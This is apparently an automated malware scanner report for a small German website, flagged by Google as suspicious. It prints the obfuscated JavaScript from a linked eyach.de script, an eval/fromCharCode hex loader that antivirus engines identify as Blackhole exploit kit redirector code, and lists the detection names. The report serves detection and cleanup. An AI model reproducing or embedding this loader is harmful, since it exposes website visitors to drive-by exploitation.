New scan:

Malware Scanner report for kohler-buch.de

Malicious/Suspicious/Total urls checked
1/1/3
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "kohler-buch.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kohler-buch.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://kohler-buch.de/
200 OK
Content-Length: 2291
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.eyach.de

...[491 bytes skipped]...
0-equiv="content-type" content="text/html; charset=iso-8859-1">
<META HTT0-EQUIV="language" CONTENT="de, deutsch">
<META name="language" content="deutsch, de">
<META name="description" content=" ">

<meta name="autor" content="Bernhard Wochner, D-72160 Horb/N (Germany)">
<meta name="publisher" content="B.Wochner">

<script type="text/javascript" src="http://www.eyach.de/eyScript3.js"></script>
<!-- <script type="text/javascript" src="c:\zeit\eyscript\eyScript3.js"></script> -->



<!-- läuft nicht ohne </script><script>!!!

<script>EyAddFil('eyMiniScript2 eyZeitquell eyTab http://www.eyach.de/eyMiniScript2.js);-->

</HEAD>


<script>EyStart3();EyImg('kohler.jpg 310','4 red'); EyTable();


EyÜ('2 <i>Buchha
...[1640 bytes skipped]...

http://www.eyach.de/eyScript3.js
200 OK
Content-Length: 5715
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62od"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_75_86_7f_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3489 bytes are skipped ...
81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_75_86_7f_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}

Antivirus reports:

AntiVir
JS/Blacole.DQ.1
Avast
JS:Decode-BKS [Trj]
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.BlackHole.BH
TrendMicro-HouseCall
TROJ_GEN.F47V0829
Comodo
Exploit.JS.Blacole.EH
McAfee-GW-Edition
JS/Exploit-Blacole.gc
DrWeb
Exploit.BlackHole.197
Kaspersky
Trojan.JS.Redirector.zu
Microsoft
Trojan:JS/BlacoleRef.DD
MicroWorld-eScan
JS:Exploit.BlackHole.BH
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.BH
AVG
JS/Exploit
Norman
Blacole.VZ
GData
JS:Exploit.BlackHole.BH
Commtouch
Trojan.ZHEK-0
BitDefender
JS:Exploit.BlackHole.BH

http://kohler-buch.de/test404page.js
404 Not Found
Content-Length: 276
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kohler-buch.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 21:31:07 GMT
Accept-Ranges: bytes
ETag: "18cc0b3-8f3-469cbd59daa80"
Server: Apache
Content-Length: 2291
Content-Type: text/html
Last-Modified: Wed, 13 May 2009 14:14:50 GMT

...2291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kohler-buch.de
Referer: http://www.google.com/search?q=kohler-buch.de

Result:
The result is similar to the first query. There are no suspicious redirects found.